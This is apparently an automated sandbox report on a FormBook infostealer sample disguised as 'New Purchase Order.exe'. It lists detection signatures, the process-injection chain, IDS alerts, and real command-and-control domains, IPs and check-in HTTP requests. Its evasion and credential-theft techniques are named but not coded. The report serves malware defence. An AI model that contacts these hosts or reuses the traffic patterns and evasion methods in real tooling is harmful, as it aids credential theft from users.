
Windows Analysis Report
New Purchase Order.exe

Overview

General Information

Sample name: New Purchase Order.exe
Analysis ID: 1567394
MD5: c4a4fd2e695f61cefcf6bacd76fd91e5
SHA1: 1d9d9b3ab5151310db4a828d329e28b77536e28c
SHA256: 750c0b5cd8ecc25f79e725e1184401806154c3d4880cfabdc3641040a21798d6
Tags: exe, user-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • New Purchase Order.exe (PID: 7668 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: C4A4FD2E695F61CEFCF6BACD76FD91E5)
    • New Purchase Order.exe (PID: 7880 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: C4A4FD2E695F61CEFCF6BACD76FD91E5)
      • snpURZzZKgO.exe (PID: 5772 cmdline: "C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 1704 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • snpURZzZKgO.exe (PID: 5828 cmdline: "C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1184 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
3.2.New Purchase Order.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.New Purchase Order.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T14:16:54.314122+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49870 | 161.97.142.144 | 80 | TCP
2024-12-03T14:17:20.238916+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49930 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:35.999511+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49968 | 54.179.173.60 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T14:16:54.314122+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49870 | 161.97.142.144 | 80 | TCP
2024-12-03T14:17:20.238916+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49930 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:35.999511+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49968 | 54.179.173.60 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T14:17:12.093744+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49910 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:14.770065+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49917 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:17.437644+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49923 | 107.155.56.30 | 80 | TCP
2024-12-03T14:17:27.781273+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49948 | 54.179.173.60 | 80 | TCP
2024-12-03T14:17:30.453326+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49956 | 54.179.173.60 | 80 | TCP
2024-12-03T14:17:33.191667+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49962 | 54.179.173.60 | 80 | TCP


                AV Detection

                Source: http://www.taxiquynhonnew.click/y49d/Avira URL Cloud: Label: malware
                Source: http://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2Avira URL Cloud: Label: malware
                Source: https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMAvira URL Cloud: Label: malware
                Source: New Purchase Order.exeReversingLabs: Detection: 42%
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: New Purchase Order.exeJoe Sandbox ML: detected
                Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611092147.0000000000D17000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: snpURZzZKgO.exe, 00000005.00000002.2610064445.00000000002DE000.00000002.00000001.01000000.0000000C.sdmp, snpURZzZKgO.exe, 00000009.00000002.2610993422.00000000002DE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1940041347.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1946811053.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000003.1940041347.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1946811053.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611092147.0000000000D17000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001DC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_001DC9D0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax8_2_001C9F80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h8_2_02AE04D0

                Networking

                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49870 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49870 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49917 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49923 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49910 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49930 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49930 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49956 -> 54.179.173.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49962 -> 54.179.173.60:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49968 -> 54.179.173.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49948 -> 54.179.173.60:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49968 -> 54.179.173.60:80
                Source: DNS query: www.070001325.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 54.179.173.60 54.179.173.60
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.070001325.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2gcl/?INvlf=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZelj0tsTwcFH17YLMDQdjUbN6i8hA==&afo=JnyH0Z2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.expancz.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.taxiquynhonnew.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.070001325.xyz
                Source: global trafficDNS traffic detected: DNS query: www.expancz.top
                Source: global trafficDNS traffic detected: DNS query: www.taxiquynhonnew.click
                Source: global trafficDNS traffic detected: DNS query: www.epitomize.shop
                Source: unknownHTTP traffic detected: POST /2gcl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.expancz.topOrigin: http://www.expancz.topConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 194Cache-Control: max-age=0Referer: http://www.expancz.top/2gcl/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:16:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"
                Source: New Purchase Order.exe, 00000000.00000002.1397890145.00000000029D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: snpURZzZKgO.exe, 00000009.00000002.2611954893.0000000000854000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click
                Source: snpURZzZKgO.exe, 00000009.00000002.2611954893.0000000000854000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click/y49d/
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                Source: snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 00000008.00000003.2130321658.0000000007604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s.yimg.com/wi/ytc.js
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                Source: tzutil.exe, 00000008.00000002.2616065129.0000000003978000.00000004.10000000.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002C78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM

                E-Banking Fraud

                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sampleStatic PE information: Filename: New Purchase Order.exe
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0042C953 NtClose,3_2_0042C953
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882B60 NtClose,LdrInitializeThunk,3_2_01882B60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01882DF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01882C70
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018835C0 NtCreateMutant,LdrInitializeThunk,3_2_018835C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01884340 NtSetContextThread,3_2_01884340
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01884650 NtSuspendThread,3_2_01884650
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882B80 NtQueryInformationFile,3_2_01882B80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882BA0 NtEnumerateValueKey,3_2_01882BA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882BE0 NtQueryValueKey,3_2_01882BE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882BF0 NtAllocateVirtualMemory,3_2_01882BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882AB0 NtWaitForSingleObject,3_2_01882AB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882AD0 NtReadFile,3_2_01882AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882AF0 NtWriteFile,3_2_01882AF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882DB0 NtEnumerateKey,3_2_01882DB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882DD0 NtDelayExecution,3_2_01882DD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882D00 NtSetInformationFile,3_2_01882D00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882D10 NtMapViewOfSection,3_2_01882D10
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882D30 NtUnmapViewOfSection,3_2_01882D30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882CA0 NtQueryInformationToken,3_2_01882CA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882CC0 NtQueryVirtualMemory,3_2_01882CC0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882CF0 NtOpenProcess,3_2_01882CF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882C00 NtQueryInformationProcess,3_2_01882C00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882C60 NtCreateKey,3_2_01882C60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882F90 NtProtectVirtualMemory,3_2_01882F90
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882FA0 NtQuerySection,3_2_01882FA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882FB0 NtResumeThread,3_2_01882FB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882FE0 NtCreateFile,3_2_01882FE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882F30 NtCreateSection,3_2_01882F30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882F60 NtCreateProcessEx,3_2_01882F60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882E80 NtReadVirtualMemory,3_2_01882E80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882EA0 NtAdjustPrivilegesToken,3_2_01882EA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882EE0 NtQueueApcThread,3_2_01882EE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882E30 NtWriteVirtualMemory,3_2_01882E30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01883090 NtSetValueKey,3_2_01883090
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01883010 NtOpenDirectoryObject,3_2_01883010
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018839B0 NtGetContextThread,3_2_018839B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01883D10 NtOpenProcessToken,3_2_01883D10
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01883D70 NtOpenThread,3_2_01883D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB4340 NtSetContextThread,LdrInitializeThunk,8_2_02CB4340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB4650 NtSuspendThread,LdrInitializeThunk,8_2_02CB4650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2AD0 NtReadFile,LdrInitializeThunk,8_2_02CB2AD0
